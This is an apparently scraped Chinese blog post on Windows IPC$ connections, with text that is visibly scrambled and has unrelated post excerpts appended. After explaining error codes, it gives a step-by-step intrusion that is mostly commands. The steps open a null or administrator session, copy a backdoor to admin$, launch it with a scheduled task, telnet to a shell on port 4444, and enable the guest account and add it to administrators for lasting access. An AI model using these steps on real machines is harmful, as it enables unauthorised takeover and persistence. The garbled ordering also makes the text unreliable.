ipc$連線
ipc$的概念:
ipc$(internet process connection)是共享」命名管道」的資源,它是為了讓程序間通訊而開放的ipc$的作用:命名管道,可以通過驗證使用者名稱和密碼獲得相應的許可權,在遠端管理計算機和檢視計算機的共享資源時使用。
利用ipc$,連線者甚至可以與目標主機建立乙個連線,利用這個連線,連線者可以得到目標主機上的目錄結構、使用者列表等資訊。ipc$的利用條件:
1. 139ipc$連線失敗的原因:,445埠開啟
ipc$連線可以實現遠端登陸及對預設共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過
139,
445(win2000)埠實現對共享檔案/印表機的訪問,因此一般來講,ipc$連線是需要139或445埠來支援的.
2. 管理員開啟了預設共享
預設共享是為了方便管理員遠端管理而預設開啟的共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或
windows(admin$),我們通過ipc$連線可以實現對這些預設共享的訪問
1.你的系統不是nt或以上作業系統.常見錯誤號:2.對方沒有開啟ipc$預設共享。
3.不能成功連線目標的139,445埠.
4.命令輸入錯誤.
5.使用者名稱或密碼錯誤.
1.錯誤號5,拒絕訪問 : 很可能你使用的使用者不是管理員許可權的,先提公升許可權;具體操作命令:2.錯誤號51,windows 無法找到網路路徑 : 網路有問題;
4.錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
5.錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方建立了乙個ipc$,請刪除再連。
6.錯誤號1326,未知的使用者名稱或錯誤密碼 : 原因很明顯了;
7.錯誤號1792,試圖登入,但是網路登入服務沒有啟動 : 目標netlogon服務未啟動。(連線域控會出現此情況)
8.錯誤號2242,此使用者的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
1.建立ipc$空連線:
net use \\127.0.0.1\ipc$ "" /user:""2.建立完整的使用者名稱,密碼連線:
net use \\127.0.0.1\ipc$ "3.對映路徑:password
" /user:"
username
"
net use z: \\127.0.0.1\c$ "4.訪問/刪除路徑:密碼" /user:"
使用者名稱" (即可將對方的c盤對映為自己的z盤,其他盤類推)
net use z: \\127.0.0.1\c$ #直接訪問5.刪除ipc$連線:net use c: /del 刪除對映的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
net use \\127.0.0.1\ipc$ /del6.入侵過程:
(1)
c:\>net use \\127.0.0.1\ipc$ "" /user:"(2)admintitrators
"這是用《流光》掃到的使用者名稱是administrators,密碼為"
空"的ip位址,如果是打算攻擊的話,
就可以用這樣的命令來與127.0.0.1建立乙個連線,因為密碼為"
空",所以第乙個引號處就不用輸入,
後面乙個雙引號裡的是使用者名稱,輸入administrators,命令即可成功完成。
c:\>copy srv.exe \\127.0.0.1(3)\admin$
先複製srv.exe上去,在流光的tools目錄下就有(這裡的$是指admin使用者的c:\winnt\system32\,
大家還可以使用c$、d$,意思是c盤與d盤,這看你要複製到什麼地方去了)。
c:\>net time \\127.0.0.1(4)查查時間,發現127.0.0.1 的當前時間是 2019/2/8 上午 11:00,命令成功完成。
c:\>at \\127.0.0.1(5)11:05
srv.exe
用at命令啟動srv.exe吧(這裡設定的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
c:\>net time \\127.0.0.1(6)再查查到時間沒有?如果127.0.0.1 的當前時間是 2019/2/8 上午 11:05,說明srv.exe已經執行,那就準備開始下面的命令。
c:\>telnet 127.0.0.1 4444(7)這裡會用到telnet命令吧,注意埠是4444。telnet預設的是23埠,但是我們使用的是srv.exe在對方計算機中為我們建立乙個4444埠的shell。
雖然我們可以telnet上去了,但是srv.exe是一次性的,下次登入還要再啟用!所以我們打算建立乙個telnet服務!這就要用到ntlm了
c:\>copy ntlm.exe \\127.0.0.1(8)\admin$
用copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的tools目錄中)。
c:\winnt\system32>ntlm(9)輸入ntlm啟動(這裡的c:\winnt\system32>指的是對方計算機,執行ntlm其實是讓這個程式在對方計算機上執行)。
當出現"
done
"的時候,就說明已經啟動正常。然後使用"
net start telnet
"來開啟telnet服務!
telnet 127.0.0.1,接著輸入使用者名稱與密碼就進入對方了,操作就像在dos上操作一樣簡單(10)
為了以防萬一,我們再把guest啟用加到管理組(11)c:\>net user guest /active:yes
將對方的guest使用者啟用
c:\>net user guest 123456(12)將guest的密碼改為123456,或者你要設定的密碼
c:\>net localgroup administrators guest /add7.如何防禦ipc$入侵:將guest變為administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
net share #檢視自己的共享8.netstat延伸使用:net view \\ip #檢視target的共享
netstat -a ip #獲取target的user列表
netstat -ano | findstr "內網滲透實戰-ipc$入侵之遠端控制port
" #檢視埠號對應的pid
tasklist | findstr "
pid" #檢視程序號對應的程式
阻止ipc 內網入侵 來,我們聊聊內網滲透!
團隊 admin team 0x00 前言 前段時間再看 metasploit 和白帽子講 web 安全,就一直想自己搭個從 web 端滲透進入內網的環境玩一下,不過因為不太懂計網的知識,拓撲圖也看不明白,搭建的過程太心酸了。趕著週末,問了群裡大佬,算是終於可以玩一下了。0x01 搭建 i春秋 fr...
阻止ipc 內網入侵 來,我們聊聊內網滲透!
0x00 前言 前段時間再看 metasploit 和白帽子講 web 安全,就一直想自己搭個從 web 端滲透進入內網的環境玩一下,不過因為不太懂計網的知識,拓撲圖也看不明白,搭建的過程太心酸了。趕著週末,問了群裡大佬,算是終於可以玩一下了。0x01 搭建 i春秋 freebuf 這裡簡單說一下我...
內網之橫向移動之IPC
ipc internet process connection 共享命名管道的資源,是為了實現程序間通訊而開放的命名管道。ipc可以通過驗證使用者名稱和密碼獲得相應的許可權。1,ipc 與空連線 不需要使用者名稱與密碼的ipc 連線即為空連線,一旦你以某個使用者或管理員的身份登陸 即以特定的使用者名...